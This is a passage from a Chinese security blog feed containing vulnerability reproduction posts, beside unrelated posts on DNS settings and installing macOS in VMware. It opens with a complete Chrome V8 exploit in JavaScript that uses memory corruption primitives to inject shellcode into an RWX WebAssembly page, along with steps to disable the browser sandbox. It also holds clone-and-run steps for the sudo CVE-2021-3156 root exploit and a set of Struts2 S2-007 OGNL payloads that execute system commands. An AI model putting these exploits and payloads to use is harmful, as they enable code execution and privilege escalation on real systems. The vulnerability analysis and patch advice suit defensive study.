class="line">let buf2 = new ArrayBuffer(<span class="number">0x150</span>);</span><br><span class="line"></span><br><span class="line">function ftoi(val) {</span><br><span class="line"> f64_buf[<span class="number">0</span>] = val;</span><br><span class="line"> return BigInt(u64_buf[<span class="number">0</span>]) + (BigInt(u64_buf[<span class="number">1</span>]) << <span class="number">32</span>n);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">function itof(val) {</span><br><span class="line"> u64_buf[<span class="number">0</span>] = Number(val & <span class="number">0xffffffff</span>n);</span><br><span class="line"> u64_buf[<span class="number">1</span>] = Number(val >> <span class="number">32</span>n);</span><br><span class="line"> return f64_buf[<span class="number">0</span>];</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">const _arr = new Uint32Array([<span class="number">2</span>**<span class="number">31</span>]);</span><br><span class="line"></span><br><span class="line">function foo(a) {</span><br><span class="line"> var x = <span class="number">1</span>;</span><br><span class="line"> x = (_arr[<span class="number">0</span>] ^ <span class="number">0</span>) + <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"> x = Math.abs(x);</span><br><span class="line"> x -= <span class="number">2147483647</span>;</span><br><span class="line"> x = Math.max(x, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"> x -= <span class="number">1</span>;</span><br><span class="line"> if(x==<span class="number">-1</span>) x = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"> var arr = new Array(x);</span><br><span class="line"> arr.shift();</span><br><span class="line"> var cor = [<span class="number">1.1</span>, <span class="number">1.2</span>, <span class="number">1.3</span>];</span><br><span class="line"></span><br><span class="line"> return [arr, cor];</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">for(var i=<span class="number">0</span>;i<<span class="number">0x3000</span>;++i)</span><br><span class="line"> foo(true);</span><br><span class="line"></span><br><span class="line">var x = foo(false);</span><br><span class="line">var arr = x[<span class="number">0</span>];</span><br><span class="line">var cor = x[<span class="number">1</span>];</span><br><span class="line"></span><br><span class="line">const idx = <span class="number">6</span>;</span><br><span class="line">arr[idx+<span class="number">10</span>] = <span class="number">0x4242</span>;</span><br><span class="line"></span><br><span class="line">function addrof(k) {</span><br><span class="line"> arr[idx+<span class="number">1</span>] = k;</span><br><span class="line"> return ftoi(cor[<span class="number">0</span>]) & <span class="number">0xffffffff</span>n;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">function fakeobj(k) {</span><br><span class="line"> cor[<span class="number">0</span>] = itof(k);</span><br><span class="line"> return arr[idx+<span class="number">1</span>];</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">var float_array_map = ftoi(cor[<span class="number">3</span>]);</span><br><span class="line"></span><br><span class="line">var arr2 = [itof(float_array_map), <span class="number">1.2</span>, <span class="number">2.3</span>, <span class="number">3.4</span>];</span><br><span class="line">var fake = fakeobj(addrof(arr2) + <span class="number">0x20</span>n);</span><br><span class="line"></span><br><span class="line">function arbread(addr) {</span><br><span class="line"> if (addr % <span class="number">2</span>n == <span class="number">0</span>) {</span><br><span class="line"> addr += <span class="number">1</span>n;</span><br><span class="line"> }</span><br><span class="line"> arr2[<span class="number">1</span>] = itof((<span class="number">2</span>n << <span class="number">32</span>n) + addr - <span class="number">8</span>n);</span><br><span class="line"> return (fake[<span class="number">0</span>]);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">function arbwrite(addr, val) {</span><br><span class="line"> if (addr % <span class="number">2</span>n == <span class="number">0</span>) {</span><br><span class="line"> addr += <span class="number">1</span>n;</span><br><span class="line"> }</span><br><span class="line"> arr2[<span class="number">1</span>] = itof((<span class="number">2</span>n << <span class="number">32</span>n) + addr - <span class="number">8</span>n);</span><br><span class="line"> fake[<span class="number">0</span>] = itof(BigInt(val));</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">function copy_shellcode(addr, shellcode) {</span><br><span class="line"> let dataview = new DataView(buf2);</span><br><span class="line"> let buf_addr = addrof(buf2);</span><br><span class="line"> let backing_store_addr = buf_addr + <span class="number">0x14</span>n;</span><br><span class="line"> arbwrite(backing_store_addr, addr);</span><br><span class="line"></span><br><span class="line"> for (let i = <span class="number">0</span>; i < shellcode.length; i++) {</span><br><span class="line"> dataview.setUint32(<span class="number">4</span>*i, shellcode[i], true);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + <span class="number">0x68</span>n));</span><br><span class="line">console.log(<span class="string">"[+] Address of rwx page: "</span> + rwx_page_addr.toString(<span class="number">16</span>));</span><br><span class="line">var shellcode = [<span class="number">3833809148</span>,<span class="number">12642544</span>,<span class="number">1363214336</span>,<span class="number">1364348993</span>,<span class="number">3526445142</span>,<span class="number">1384859749</span>,<span class="number">1384859744</span>,<span class="number">1384859672</span>,<span class="number">1921730592</span>,<span class="number">3071232080</span>,<span class="number">827148874</span>,<span class="number">3224455369</span>,<span class="number">2086747308</span>,<span class="number">1092627458</span>,<span class="number">1091422657</span>,<span class="number">3991060737</span>,<span class="number">1213284690</span>,<span class="number">2334151307</span>,<span class="number">21511234</span>,<span class="number">2290125776</span>,<span class="number">1207959552</span>,<span class="number">1735704709</span>,<span class="number">1355809096</span>,<span class="number">1142442123</span>,<span class="number">1226850443</span>,<span class="number">1457770497</span>,<span class="number">1103757128</span>,<span class="number">1216885899</span>,<span class="number">827184641</span>,<span class="number">3224455369</span>,<span class="number">3384885676</span>,<span class="number">3238084877</span>,<span class="number">4051034168</span>,<span class="number">608961356</span>,<span class="number">3510191368</span>,<span class="number">1146673269</span>,<span class="number">1227112587</span>,<span class="number">1097256961</span>,<span class="number">1145572491</span>,<span class="number">1226588299</span>,<span class="number">2336346113</span>,<span class="number">21530628</span>,<span class="number">1096303056</span>,<span class="number">1515806296</span>,<span class="number">1497454657</span>,<span class="number">2202556993</span>,<span class="number">1379999980</span>,<span class="number">1096343807</span>,<span class="number">2336774745</span>,<span class="number">4283951378</span>,<span class="number">1214119935</span>,<span class="number">442</span>,<span class="number">0</span>,<span class="number">2374846464</span>,<span class="number">257</span>,<span class="number">2335291969</span>,<span class="number">3590293359</span>,<span class="number">2729832635</span>,<span class="number">2797224278</span>,<span class="number">4288527765</span>,<span class="number">3296938197</span>,<span class="number">2080783400</span>,<span class="number">3774578698</span>,<span class="number">1203438965</span>,<span class="number">1785688595</span>,<span class="number">2302761216</span>,<span class="number">1674969050</span>,<span class="number">778267745</span>,<span class="number">6649957</span>];</span><br><span class="line">copy_shellcode(rwx_page_addr, shellcode);</span><br><span class="line">f();</span><br></pre></td></tr></table></figure>
<p>html文件</p>
<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line"><span class="tag"><<span class="name">script</span> <span class="attr">src</span>=<span class="string">"exploit.js"</span>></span><span class="tag"></<span class="name">script</span>></span> //加载exploit js文件</span><br></pre></td></tr></table></figure>
<p>关闭浏览器沙箱</p>
<figure class="highlight taggerscript"><table><tr><td class="code"><pre><span class="line">#退出浏览器进程进行打开</span><br><span class="line">"C:<span class="symbol">\P</span>rogram Files (x86)<span class="symbol">\G</span>oogle<span class="symbol">\C</span>hrome<span class="symbol">\A</span>pplication<span class="symbol">\c</span>hrome.exe" -no-sandbox</span><br><span class="line">或</span><br><span class="line">"C:<span class="symbol">\P</span>rogram Files (x86)<span class="symbol">\G</span>oogle<span class="symbol">\C</span>hrome<span class="symbol">\A</span>pplication<span class="symbol">\c</span>hrome.exe" --args --no-sandbox</span><br></pre></td></tr></table></figure>
<p><img src="/img/chrome%200day/image-20210413160904379.png" alt="image-20210413160904379"></p>
<p>打开exploit.html页面弹出计算器(Edge浏览器同样存在)</p>
<p><img src="/img/chrome%200day/image-20210413160943095.png" alt="image-20210413160943095"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://github.com/r4j0x00/exploits/tree/master/chrome-0day" target="_blank" rel="noopener">https://github.com/r4j0x00/exploits/tree/master/chrome-0day</a></p>
<p><a href="https://mp.weixin.qq.com/s/dZl_Urk8cOJ1Qbe16HBFGQ" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/dZl_Urk8cOJ1Qbe16HBFGQ</a></p>
]]></content>
<tags>
<tag>漏洞复现</tag>
</tags>
</entry>
<entry>
<title>Linux sudo权限提升(CVE-2021-3156)漏洞复现</title>
<url>/2021/02/04/Linux-sudo%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%EF%BC%88CVE-2021-3156%EF%BC%89/</url>
<content><![CDATA[<p>本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。</p>
<div style="text-align: right"> 小维</div>
<h4 id="漏洞概述"><a href="#漏洞概述" class="headerlink" title="漏洞概述"></a>漏洞概述</h4><p>Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo。</p>
<p>2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升。</p>
<p>当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。</p>
<p>安全研究人员于1月26日公开披露了此漏洞,并表示该漏洞已经隐藏了近十年。</p>
<a id="more"></a>
<h4 id="受影响版本"><a href="#受影响版本" class="headerlink" title="受影响版本"></a>受影响版本</h4><figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">Sudo <span class="number">1.8</span><span class="number">.2</span> - <span class="number">1.8</span><span class="number">.31</span>p2</span><br><span class="line">Sudo <span class="number">1.9</span><span class="number">.0</span> - <span class="number">1.9</span><span class="number">.5</span>p1</span><br></pre></td></tr></table></figure>
<h4 id="检测方法"><a href="#检测方法" class="headerlink" title="检测方法"></a>检测方法</h4><p>以非root用户登录系统,并运行<code>sudoedit -s /</code>命令</p>
<p>响应一个以<code>sudoedit:</code>开头的报错,那么表明存在漏洞。</p>
<p><img src="/img/Linux-sudo%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%EF%BC%88CVE-2021-3156%EF%BC%89/image-20210202103228116.png" alt="image-20210202103228116"></p>
<p>响应一个以<code>usage:</code>开头的报错,那么表明补丁已经生效。</p>
<p><img src="/img/Linux-sudo%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%EF%BC%88CVE-2021-3156%EF%BC%89/image-20210202114538438.png" alt="image-20210202114538438"></p>
<h4 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://github.com/blasty/CVE-2021-3156.git</span><br><span class="line"><span class="built_in">cd</span> CVE-2021-3156</span><br><span class="line">make</span><br><span class="line">./sudo-hax-me<span class="_">-a</span>-sandwich <target_number></span><br></pre></td></tr></table></figure>
<h5 id="kali-Linux-测试"><a href="#kali-Linux-测试" class="headerlink" title="kali Linux 测试"></a>kali Linux 测试</h5><p><img src="/img/Linux-sudo%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%EF%BC%88CVE-2021-3156%EF%BC%89/image-20210202104425241.png" alt="image-20210202104425241"></p>
<h4 id="修复建议"><a href="#修复建议" class="headerlink" title="修复建议"></a>修复建议</h4><p>官方已在sudo新版本1.9.5p2中修复了该漏洞,请受影响的用户尽快升级版本进行防护。</p>
<p>官方下载链接:<a href="https://www.sudo.ws/download.html" target="_blank" rel="noopener">https://www.sudo.ws/download.html</a></p>
<p><img src="/img/Linux-sudo%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%EF%BC%88CVE-2021-3156%EF%BC%89/image-20210202114622883.png" alt="image-20210202114622883"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://www.sudo.ws/alerts/unescape_overflow.html" target="_blank" rel="noopener">https://www.sudo.ws/alerts/unescape_overflow.html</a></p>
<p><a href="http://blog.nsfocus.net/cve-2021-3156/" target="_blank" rel="noopener">http://blog.nsfocus.net/cve-2021-3156/</a></p>
<p><a href="https://github.com/blasty/CVE-2021-3156" target="_blank" rel="noopener">https://github.com/blasty/CVE-2021-3156</a></p>
]]></content>
<tags>
<tag>漏洞复现</tag>
</tags>
</entry>
<entry>
<title>解决国内无法访问 *.github.io</title>
<url>/2021/02/01/%E8%A7%A3%E5%86%B3%E5%9B%BD%E5%86%85%E6%97%A0%E6%B3%95%E8%AE%BF%E9%97%AE-.github.io/</url>
<content><![CDATA[<p><img src="/img/%E8%A7%A3%E5%86%B3%E5%9B%BD%E5%86%85%E6%97%A0%E6%B3%95%E8%AE%BF%E9%97%AE-.github.io/image-20210201110915058.png" alt="image-20210201110915058"></p>
<a id="more"></a>
<p>解决办法:</p>
<p>修改DNS服务器,使用208.67.222.222(opendns)可以正常解析,可将其设置为备用DNS即可。</p>
<p>Windows操作步骤:</p>
<figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">① win+r 输入 ncpa.cpl</span><br><span class="line">② 选择对应的网络连接右键选择属性</span><br><span class="line">③ 选择 Internet 协议版本<span class="number">4</span> (TCP/IPV4)</span><br><span class="line">④ 选择使用下面的DNS服务器地址</span><br><span class="line">⑤ 输入<span class="number">208.67</span><span class="number">.222</span><span class="number">.222</span>(可将设置为首选/备用)</span><br><span class="line">⑥ 确定并保存</span><br><span class="line"></span><br><span class="line">注:如果还是无法访问可进行DNS缓存刷新,Windows刷新DNS缓存:ipconfig/flushdns</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%A7%A3%E5%86%B3%E5%9B%BD%E5%86%85%E6%97%A0%E6%B3%95%E8%AE%BF%E9%97%AE-.github.io/image-20210201110827948.png" alt="image-20210201110827948"></p>
<p><img src="/img/%E8%A7%A3%E5%86%B3%E5%9B%BD%E5%86%85%E6%97%A0%E6%B3%95%E8%AE%BF%E9%97%AE-.github.io/image-20210201111603731.png" alt="image-20210201111603731"></p>
]]></content>
</entry>
<entry>
<title>VMware 安装黑苹果系统(MacOS)</title>
<url>/2021/01/29/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/</url>
<content><![CDATA[<h4 id="写在前面"><a href="#写在前面" class="headerlink" title="写在前面"></a>写在前面</h4><p>经常有时候需要测试MAC的一些软件,所以就想着用VM来安装黑苹果来进行一些软件的测试。</p>
<h4 id="环境介绍"><a href="#环境介绍" class="headerlink" title="环境介绍"></a>环境介绍</h4><figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">操作系统:Windows <span class="number">10</span> <span class="number">10.0</span><span class="number">.18363</span></span><br><span class="line">VMware版本:VMware® Workstation <span class="number">15</span> Pro <span class="number">15.5</span><span class="number">.2</span> build<span class="number">-15785246</span></span><br></pre></td></tr></table></figure>
<a id="more"></a>
<h4 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h4><h5 id="准备工作"><a href="#准备工作" class="headerlink" title="准备工作"></a>准备工作</h5><figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">MK-Unlocker-VM15<span class="number">.5</span>.zip(Unlocker补丁,支持 Vmware <span class="number">15.5</span><span class="number">.5</span>)</span><br><span class="line">macOS.Catalina<span class="number">.10</span><span class="number">.15</span><span class="number">.5</span><span class="number">.01</span>.LY.iso(MacOS镜像)</span><br><span class="line">下载地址:链接:https:<span class="comment">//pan.baidu.com/s/1SOUCyZ0Ys7PQcxQpAhKTHg 提取码:down</span></span><br></pre></td></tr></table></figure>
<h5 id="VMware虚拟机安装"><a href="#VMware虚拟机安装" class="headerlink" title="VMware虚拟机安装"></a>VMware虚拟机安装</h5><p>这里安装VMware虚拟机不在赘述,可自行百度进行下载安装。</p>
<h5 id="解锁"><a href="#解锁" class="headerlink" title="解锁"></a>解锁</h5><p>默认的 VMware 是不支持识别苹果系统镜像的,所以需要用到Unlocker工具进行解锁,进行对MK-Unlocker-VM15.5.zip解压,然后以管理员身份运行win-install.cmd脚本</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126172049200.png" alt="image-20210126172049200"></p>
<p>等待运行完毕即可。</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126172832152.png" alt="image-20210126172832152"></p>
<h5 id="MacOS"><a href="#MacOS" class="headerlink" title="MacOS"></a>MacOS</h5><p>打开Vmware虚拟机,新建虚拟机,选择macOS.Catalina.10.15.5.01.LY.iso,选择Apple Mac OS x的选项(未解锁是没有这个选项),之后默认即可,也可自己进行配置,直到完成。</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126173349851.png" alt="image-20210126173349851"></p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126173627968.png" alt="image-20210126173627968"></p>
<p>完成后不要立即启动,先找到保存虚拟机文件的目录,找到后缀为 .vmx 的文件,进行编辑,在最后一行添加</p>
<p><code>smc.version = 0</code>,保存并退出。</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126174636509.png" alt="image-20210126174636509"></p>
<p>启动虚拟机</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126174747413.png" alt="image-20210126174747413"></p>
<p>选择语言,这里选择”简体中文”,点击”箭头”下一步</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126175117143.png" alt="image-20210126175117143"></p>
<p>选择”磁盘工具”,点击”继续”进行对磁盘分区,注意分区安装系统的磁盘需要大于25GB以上。</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126175242992.png" alt="image-20210126175242992"></p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126180200605.png" alt="image-20210126180200605"></p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126180544001.png" alt="image-20210126180544001"></p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126185615418.png" alt="image-20210126185615418"></p>
<p>点击”退出磁盘工具”</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126182728141.png" alt="image-20210126182728141"></p>
<p>选择”安装macOS”,点击”继续”</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126181159749.png" alt="image-20210126181159749"></p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126183123501.png" alt="image-20210126183123501"></p>
<p>安装完成后,弹出欢迎使用和设置界面,接下来就是一些设置,设置完即可进入苹果系统了</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126194401893.png" alt="image-20210126194401893"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://www.cnblogs.com/deshun/p/10652385.html" target="_blank" rel="noopener">https://www.cnblogs.com/deshun/p/10652385.html</a></p>
]]></content>
</entry>
<entry>
<title>Struts2-007漏洞分析</title>
<url>/2020/12/28/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/</url>
<content><![CDATA[<h4 id="漏洞概要"><a href="#漏洞概要" class="headerlink" title="漏洞概要"></a>漏洞概要</h4><p>可参考官方安全公告:<a href="https://cwiki.apache.org/confluence/display/WW/S2-007" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-007</a></p>
<h4 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h4><p>S2-007的利用场景比较苛刻,要求对提交的参数配置了验证规则并对提交的参数进行类型转换的时候会造成<code>OGNL</code>表达式的执行。</p>
<p>这个漏洞的成因在于,在Struts2中,关于表单我们可以设置每个字段的规则验证,如果类型转换错误时,就会进行错误的字符串拼接,通过闭合引号导致<code>OGNL</code>的语法解析。</p>
<a id="more"></a>
<p>简易POC</p>
<figure class="highlight 1c"><table><tr><td class="code"><pre><span class="line">'+(#application)+'</span><br></pre></td></tr></table></figure>
<p>在 Struts2 中,可以将 HTTP 请求数据注入到实际业务 Action 的属性中。而这些属性可以是任意类型的数据,通过 HTTP 只能获取到 String 类型数据,所以这里存在类型转换。我们可以通过 xml 文件,来定义转换规则。例如,我这里定义了一个 <code>UserAction</code> 类,其有一个 <code>Integer</code> 类型的 <code>age</code> 属性,这里我们让其数值范围在<code>1-150</code> 。</p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201228145655095.png" alt="image-20201228145655095"></p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225155539404.png" alt="image-20201225155539404"></p>
<p>如果此时我们将 <code>age</code> 属性值设置成一个字符串,那么就会引发类型转换错误。Struts2 会将用户输入的数据经过处理再次返回给用户。</p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225155827873.png" alt="image-20201225155827873"></p>
<p>而在这个处理的过程中,就存在 <code>OGNL</code> 表达式注入,我们先在<code>ConversionErrorInterceptor:intercept()</code>方法中打上断点(<code>ConversionErrorInterceptor</code> 类是专门用来处理类型转换失败的拦截器),当类型出现错误的时候,就会进入这里</p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225160842454.png" alt="image-20201225160842454"></p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225160414486.png" alt="image-20201225160414486"></p>
<p>当发生类型转换错误时,程序会将用户输入的值存入 <code>fakie</code> 变量。在存入之前,会先将值用 <code>getOverrideExpr</code>方法处理,我们跟进该方法。</p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225161637883.png" alt="image-20201225161637883"></p>
<p>在 <code>getOverrideExpr</code> 方法中,会在用户输入的值两边拼接上单引号,然后再将值存入刚刚的 <code>fakie</code> 变量。这里把我们的payload用单引号阔起来了,这也就解释了为什么我们的payload是形如 <code>' + (*) + '</code>的形式,就是为了逃逸这个单引号。</p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225161954632.png" alt="image-20201225161954632"></p>
<p>接着程序会把<code>fakie</code> 变量通过<code>setExprOverrides</code>将其放入<code>OgnlValueStack.overrides</code>中</p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225162709287.png" alt="image-20201225162709287"></p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225164705641.png" alt="image-20201225164705641"></p>
<p>然后在解析到 Struts2的 <code>/></code>标签时,会将用户输入值经过<code>OGNL</code> 执行并返回。如果先前 <code>OgnlValueStack.overrides</code>存储过相关字段,则会先从<code>OgnlValueStack.overrides</code> 中取出相关值,然后再通过<code>OGNL</code>执行。</p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225172127453.png" alt="image-20201225172127453"></p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225172048324.png" alt="image-20201225172048324"></p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225172537185.png" alt="image-20201225172537185"></p>
<figure class="highlight purebasic"><table><tr><td class="code"><pre><span class="line"># 弹计算器</span><br><span class="line">'+(<span class="symbol">#context</span>[<span class="string">"xwork.MethodAccessor.denyMethodExecution"</span>]=false,@java.lang.<span class="keyword">Runtime</span>@getRuntime().exec(<span class="string">"calc"</span>))+'</span><br><span class="line"></span><br><span class="line">'+(<span class="symbol">#_memberAccess</span>[<span class="string">"allowStaticMethodAccess"</span>]=true,<span class="symbol">#context</span>[<span class="string">"xwork.MethodAccessor.denyMethodExecution"</span>]=false,@java.lang.<span class="keyword">Runtime</span>@getRuntime().exec(<span class="string">"calc"</span>))+'</span><br><span class="line"></span><br><span class="line"># 获取绝对路径</span><br><span class="line">'+(<span class="symbol">#context</span>[<span class="string">"xwork.MethodAccessor.denyMethodExecution"</span>]=false,<span class="symbol">#req</span>=@org.apache.struts2.ServletActionContext@getRequest(),<span class="symbol">#response</span>=<span class="symbol">#context</span>.get(<span class="string">"com.opensymphony.xwork2.dispatcher.HttpServletResponse"</span>).getWriter().write(<span class="symbol">#req</span>.getRealPath('/')))+'</span><br><span class="line"></span><br><span class="line">'+(<span class="symbol">#_memberAccess</span>[<span class="string">"allowStaticMethodAccess"</span>]=true,<span class="symbol">#context</span>[<span class="string">"xwork.MethodAccessor.denyMethodExecution"</span>]=false,<span class="symbol">#req</span>=@org.apache.struts2.ServletActionContext@getRequest(),<span class="symbol">#response</span>=<span class="symbol">#context</span>.get(<span class="string">"com.opensymphony.xwork2.dispatcher.HttpServletResponse"</span>).getWriter().write(<span class="symbol">#req</span>.getRealPath('/')))+'</span><br><span class="line"></span><br><span class="line"># 执行系统命令并回显</span><br><span class="line">'+(<span class="symbol">#context</span>[<span class="string">"xwork.MethodAccessor.denyMethodExecution"</span>]=false,<span class="symbol">#response</span>=<span class="symbol">#context</span>.get(<span class="string">"com.opensymphony.xwork2.dispatcher.HttpServletResponse"</span>).getWriter().write(new java.util.Scanner(@java.lang.<span class="keyword">Runtime</span>@getRuntime().exec('whoami').getInputStream()).useDelimiter(<span class="string">"\\Z"</span>).next()))+'</span><br><span class="line"></span><br><span class="line">'+(<span class="symbol">#_memberAccess</span>[<span class="string">"allowStaticMethodAccess"</span>]=true,<span class="symbol">#context</span>[<span class="string">"xwork.MethodAccessor.denyMethodExecution"</span>]=false,<span class="symbol">#response</span>=<span class="symbol">#context</span>.get(<span class="string">"com.opensymphony.xwork2.dispatcher.HttpServletResponse"</span>).getWriter().write(new java.util.Scanner(@java.lang.<span class="keyword">Runtime</span>@getRuntime().exec('whoami').getInputStream()).useDelimiter(<span class="string">"\\Z"</span>).next()))+'</span><br></pre></td></tr></table></figure>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225172935494.png" alt="image-20201225172935494"></p>
<h4 id="修复"><a href="#修复" class="headerlink" title="修复"></a>修复</h4><p>使用 <code>org.apache.commons.lang.StringEscapeUtils.escapeJava()</code>来做了一下escape,防止再从引号里面逃逸出来。</p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225173722361.png" alt="image-20201225173722361"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://xz.aliyun.com/t/7971" target="_blank" rel="noopener">https://xz.aliyun.com/t/7971</a></p>
<p><a href="https://cwiki.apache.org/confluence/display/WW/S2-007" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-007</a></p>
]]></content>
<tags>
<tag>Struts2</tag>
</tags>
</entry>
<entry>
<title>Struts2-004 漏洞分析</title>
<url>/2020/12/24/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/</url>
<content><![CDATA[<h4 id="漏洞概要"><a href="#漏洞概要" class="headerlink" title="漏洞概要"></a>漏洞概要</h4><p>可参考官方安全公告:<a href="https://cwiki.apache.org/confluence/display/WW/S2-004" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-004</a></p>
<h4 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h4><p>攻击者可以使用双重编码的url和相对路径来遍历目录结构并下载“静态”内容文件夹之外的文件。</p>
<a id="more"></a>
<p>根据官方概述,得知漏洞存在的类为 <code>FilterDispatcher</code>过滤器,一般在<code>doFilter</code>方法中进行操作,我们将<code>doFilter</code>进行断点</p>
